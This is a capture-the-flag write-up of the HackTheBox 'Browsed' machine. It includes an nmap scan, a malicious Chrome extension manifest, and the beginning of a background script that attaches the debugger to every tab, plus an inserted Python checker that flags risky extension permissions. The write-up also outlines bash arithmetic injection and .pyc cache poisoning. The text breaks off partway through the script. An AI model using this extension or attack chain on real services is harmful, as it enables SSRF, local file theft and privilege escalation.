web / free / hard

Browsed

hackthebox

Task: Full box exploitation of a website that processes Chrome extensions in a headless browser. Solution: Upload a malicious extension that uses the chrome.debugger API for SSRF, exploit bash arithmetic evaluation injection ([[ $var -eq 0 ]]) for RCE as user, then poison the Python .pyc cache with a matching timestamp/size in a world-writable __pycache__ for root privilege escalation.

$ ls tags/ techniques/
malicious_extension_upload  chrome_debugger_ssrf  bash_eq_injection  python_bytecode_poisoning  timestamp_bypass


Browsed - HackTheBox

Overview

Target: 10.129.2.1
Services: SSH (22), HTTP (80) - nginx/1.24.0 Ubuntu
Difficulty: Hard
Attack Chain: Chrome Extension Exploitation -> Bash Arithmetic Injection -> Python .pyc Cache Poisoning

This box demonstrates a sophisticated multi-stage attack involving browser extension abuse, bash arithmetic evaluation vulnerabilities, and Python bytecode cache poisoning for privilege escalation.


Phase 1: Initial Reconnaissance

Service Enumeration

nmap -sC -sV -p- 10.129.2.1
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu
80/tcp open  http    nginx/1.24.0 (Ubuntu)

Web Application Analysis

The website browsed.htb belongs to a company that develops browser extensions. Key discoveries:

  • Upload endpoint: /upload.php accepts Chrome extensions in .zip format
  • Uploaded extensions are executed in a headless Chrome environment
  • The headless browser visits:
    • http://localhost/
    • http://browsedinternals.htb

Phase 2: Initial Access via Malicious Chrome Extension

Understanding the Attack Vector

Chrome extensions with debugger API permissions can:

  • Attach to any tab
  • Read local files via file:// protocol
  • Access internal services (SSRF)

Creating the Malicious Extension

manifest.json:

{
  "manifest_version": 3,
  "name": "Security Test Extension",
  "version": "1.0",
  "permissions": [
    "debugger",
    "tabs",
    "activeTab"
  ],
  "host_permissions": [
    "<all_urls>",
    "file://*/*"
  ],
  "background": {
    "service_worker": "background.js"
  },
  "content_scripts": [{
    "matches": ["<all_urls>"],
    "js": ["content.js"]
  }]
}
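From the upload service's side, the permissions requested in this manifest are exactly what a pre-execution check can reject before any browser loads the archive. The following is an added example, not code from the original writeup or from the target application: it audits an uploaded archive's manifest.json in Python. The function names, finding labels and the 64 KiB manifest size limit are assumptions, and the sample archive is constructed from the manifest above.

```python
import io
import json
import zipfile

RISKY_PERMISSIONS = {"debugger"}         # lets an extension attach to tabs
BROAD_HOSTS = {"<all_urls>", "*://*/*"}  # match every page the browser opens
# Constructed sample input: the manifest shown above, as a dict.
PAGE_MANIFEST = {"manifest_version": 3, "name": "Security Test Extension", "version": "1.0",
                 "permissions": ["debugger", "tabs", "activeTab"],
                 "host_permissions": ["<all_urls>", "file://*/*"],
                 "background": {"service_worker": "background.js"},
                 "content_scripts": [{"matches": ["<all_urls>"], "js": ["content.js"]}]}

def _strings(value):  # keep only string entries so odd manifests cannot crash the audit
    return [v for v in value if isinstance(v, str)] if isinstance(value, list) else []

def audit_manifest(manifest: dict) -> list:
    """Return findings for a parsed manifest.json; an empty list means nothing flagged."""
    findings = []
    perms = _strings(manifest.get("permissions")) + _strings(manifest.get("optional_permissions"))
    findings += [f"permission:{p}" for p in sorted(set(perms) & RISKY_PERMISSIONS)]
    hosts = perms + _strings(manifest.get("host_permissions"))  # MV2 keeps hosts in permissions
    scripts = manifest.get("content_scripts")
    for script in scripts if isinstance(scripts, list) else []:
        if isinstance(script, dict):
            hosts += _strings(script.get("matches"))
    for pattern in sorted(set(hosts)):
        if pattern in BROAD_HOSTS or pattern.lower().startswith("file:"):
            kind = "broad-host" if pattern in BROAD_HOSTS else "local-file-host"
            findings.append(f"{kind}:{pattern}")
    return findings

def audit_extension_zip(data: bytes, max_manifest_bytes: int = 64 * 1024) -> list:
    """Audit an uploaded archive before any browser loads it; parse failures are findings."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            info = zf.getinfo("manifest.json")  # KeyError when the file is missing
            if info.file_size > max_manifest_bytes:
                return ["manifest-too-large"]
            manifest = json.loads(zf.read(info))
    except (zipfile.BadZipFile, KeyError, ValueError):
        return ["invalid-archive-or-manifest"]
    return audit_manifest(manifest) if isinstance(manifest, dict) else ["invalid-archive-or-manifest"]

def build_zip(manifest) -> bytes:  # helper that builds the constructed sample archive
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("manifest.json", json.dumps(manifest))
    return buf.getvalue()
```

Calling audit_extension_zip(build_zip(PAGE_MANIFEST)) flags the debugger permission, the <all_urls> pattern and the file:// pattern; an upload handler would refuse the archive on any non-empty result.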

background.js:

// Service worker for malicious extension
chrome.runtime.onInstalled.addListener(async () => {
  console.log("Extension installed, starting reconnaissance...");
  // Wait for tabs to be available
  setTimeout(async () => {
    try {
      // Get all tabs
      const tabs = await chrome.tabs.query({});
      for (const tab of tabs) {
        // Attach debugger to each tab
        await attachAndExploit(tab);
      }
    } catch (e) {
      console.error("Error:", e);
    }
  }, 2000);
});
...
